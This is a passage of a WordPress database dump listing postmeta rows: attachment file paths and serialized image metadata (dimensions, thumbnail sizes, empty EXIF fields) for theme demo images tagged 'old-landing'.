(3088,1035,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:16;s:6:\"height\";i:16;s:4:\"file\";s:25:\"2016/11/the7-new-fav1.gif\";s:8:\"filesize\";i:1302;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3089,1035,'_the7_imported_item','old-landing'),
(3090,1036,'_wp_attached_file','2016/11/the7-old-ipad1.gif'),
(3091,1036,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:76;s:6:\"height\";i:76;s:4:\"file\";s:26:\"2016/11/the7-old-ipad1.gif\";s:8:\"filesize\";i:2437;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3092,1036,'_the7_imported_item','old-landing'),
(3093,1046,'_wp_attached_file','2016/11/d-constr.jpg'),
(3094,1046,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2016/11/d-constr.jpg\";s:8:\"filesize\";i:7139;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"d-constr-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2773;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"d-constr-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1723;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3095,1046,'_the7_imported_item','old-landing'),
(3096,1051,'_wp_attached_file','2016/11/d-under-constr-02.jpg'),
(3097,1051,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:29:\"2016/11/d-under-constr-02.jpg\";s:8:\"filesize\";i:62335;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"d-under-constr-02-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12425;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"d-under-constr-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6423;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3098,1051,'_the7_imported_item','old-landing'),
(3099,1056,'_wp_attached_file','2016/11/d-under-constr-nav.jpg'),
(3100,1056,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:30:\"2016/11/d-under-constr-nav.jpg\";s:8:\"filesize\";i:21354;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"d-under-constr-nav-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6219;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"d-under-constr-nav-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3681;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3101,1056,'_the7_imported_item','old-landing'),
(3102,1058,'_wp_attached_file','2016/11/d-business-one-page.jpg'),
(3103,1058,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:31:\"2016/11/d-business-one-page.jpg\";s:8:\"filesize\";i:65283;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"d-business-one-page-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14296;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"d-business-one-page-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6862;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3104,1058,'_the7_imported_item','old-landing'),
(3105,1166,'_wp_attached_file','2017/01/bg-blur.jpg'),
(3106,1166,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1700;s:6:\"height\";i:1000;s:4:\"file\";s:19:\"2017/01/bg-blur.jpg\";s:8:\"filesize\";i:32744;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"bg-blur-300x176.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2135;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"bg-blur-1024x602.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:602;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13057;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"bg-blur-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1414;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"bg-blur-768x452.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7941;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"bg-blur-1536x904.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:904;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27416;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3107,1166,'_the7_imported_item','old-landing'),
(3108,1167,'_wp_attached_file','2017/01/3-r-tiny.png'),
(3109,1167,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:907;s:6:\"height\";i:420;s:4:\"file\";s:20:\"2017/01/3-r-tiny.png\";s:8:\"filesize\";i:52855;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"3-r-tiny-300x139.png\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32173;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"3-r-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10337;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"3-r-tiny-768x356.png\";s:5:\"width\";i:768;s:6:\"height\";i:356;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:168419;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3110,1167,'_the7_imported_item','old-landing'),
(3111,1168,'_wp_attached_file','2017/01/l-3-tiny.png'),
(3112,1168,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1264;s:6:\"height\";i:718;s:4:\"file\";s:20:\"2017/01/l-3-tiny.png\";s:8:\"filesize\";i:77519;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"l-3-tiny-300x170.png\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31768;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"l-3-tiny-1024x582.png\";s:5:\"width\";i:1024;s:6:\"height\";i:582;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:263038;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"l-3-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12521;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"l-3-tiny-768x436.png\";s:5:\"width\";i:768;s:6:\"height\";i:436;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:160906;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3113,1168,'_the7_imported_item','old-landing'),
(3114,1169,'_wp_attached_file','2017/01/2-l-tiny.png'),
(3115,1169,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:666;s:6:\"height\";i:873;s:4:\"file\";s:20:\"2017/01/2-l-tiny.png\";s:8:\"filesize\";i:49134;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"2-l-tiny-229x300.png\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56511;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"2-l-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23476;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3116,1169,'_the7_imported_item','old-landing'),
(3117,1170,'_wp_attached_file','2017/01/2-r-tiny.png'),
(3118,1170,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:958;s:6:\"height\";i:823;s:4:\"file\";s:20:\"2017/01/2-r-tiny.png\";s:8:\"filesize\";i:83384;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"2-r-tiny-300x258.png\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65721;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"2-r-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23721;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"2-r-tiny-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:357502;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3119,1170,'_the7_imported_item','old-landing'),
(3120,1171,'_wp_attached_file','2017/01/l-1-tiny.png'),
(3121,1171,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:924;s:6:\"height\";i:1003;s:4:\"file\";s:20:\"2017/01/l-1-tiny.png\";s:8:\"filesize\";i:115052;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"l-1-tiny-276x300.png\";s:5:\"width\";i:276;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:85554;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"l-1-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28853;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"l-1-tiny-768x834.png\";s:5:\"width\";i:768;s:6:\"height\";i:834;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:564685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3122,1171,'_the7_imported_item','old-landing'),
(3123,1172,'_wp_attached_file','2017/01/r-1-tiny.png'),
(3124,1172,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1182;s:6:\"height\";i:928;s:4:\"file\";s:20:\"2017/01/r-1-tiny.png\";s:8:\"filesize\";i:114799;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"r-1-tiny-300x236.png\";s:5:\"width\";i:300;s:6:\"height\";i:236;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56581;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"r-1-tiny-1024x804.png\";s:5:\"width\";i:1024;s:6:\"height\";i:804;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:544968;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"r-1-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22778;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"r-1-tiny-768x603.png\";s:5:\"width\";i:768;s:6:\"height\";i:603;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:315707;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3125,1172,'_the7_imported_item','old-landing'),
(3126,1173,'_wp_attached_file','2017/01/art-m-tiny.png'),
(3127,1173,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:350;s:4:\"file\";s:22:\"2017/01/art-m-tiny.png\";s:8:\"filesize\";i:99505;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"art-m-tiny-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"art-m-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34132;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"art-m-tiny-768x263.png\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:266894;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3128,1173,'_the7_imported_item','old-landing'),
(3129,1174,'_wp_attached_file','2017/01/vc-hero-tiny.png'),
(3130,1174,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:87;s:6:\"height\";i:87;s:4:\"file\";s:24:\"2017/01/vc-hero-tiny.png\";s:8:\"filesize\";i:2042;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3131,1174,'_the7_imported_item','old-landing'),
(3132,1175,'_wp_attached_file','2017/01/addons-hero-tiny.png'),
(3133,1175,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:105;s:6:\"height\";i:105;s:4:\"file\";s:28:\"2017/01/addons-hero-tiny.png\";s:8:\"filesize\";i:2517;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3134,1175,'_the7_imported_item','old-landing'),
(3135,1176,'_wp_attached_file','2017/01/slider-logo-img-tiny.png'),
(3136,1176,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:234;s:6:\"height\";i:234;s:4:\"file\";s:32:\"2017/01/slider-logo-img-tiny.png\";s:8:\"filesize\";i:4416;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"slider-logo-img-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8708;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3137,1176,'_the7_imported_item','old-landing'),
(3138,1182,'_wp_attached_file','2016/11/d-creative-agency-1.jpg'),
(3139,1182,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:31:\"2016/11/d-creative-agency-1.jpg\";s:8:\"filesize\";i:77476;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"d-creative-agency-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12335;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"d-creative-agency-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6145;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3140,1182,'_the7_imported_item','old-landing'),
(3141,1183,'_wp_attached_file','2016/11/d-hosting-1.jpg'),
(3142,1183,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:23:\"2016/11/d-hosting-1.jpg\";s:8:\"filesize\";i:81633;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"d-hosting-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13262;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"d-hosting-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6327;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3143,1183,'_the7_imported_item','old-landing'),
(3144,1196,'_wp_attached_file','2016/11/d-more-coming-soon.jpg'),
(3145,1196,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:30:\"2016/11/d-more-coming-soon.jpg\";s:8:\"filesize\";i:14790;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"d-more-coming-soon-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2964;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"d-more-coming-soon-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1652;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3146,1196,'_the7_imported_item','old-landing'),
(3147,1213,'_wp_attached_file','2016/11/d-conference.jpg'),
(3148,1213,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2016/11/d-conference.jpg\";s:8:\"filesize\";i:73962;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"d-conference-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12580;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"d-conference-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7034;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3149,1213,'_the7_imported_item','old-landing'),
(3150,1221,'_wp_attached_file','2016/11/d-blog-and-news.jpg'),
(3151,1221,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2016/11/d-blog-and-news.jpg\";s:8:\"filesize\";i:113263;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"d-blog-and-news-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16953;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"d-blog-and-news-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7936;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3152,1221,'_the7_imported_item','old-landing'),
(3153,1225,'_wp_attached_file','2016/11/d-digital-agency-1.jpg'),
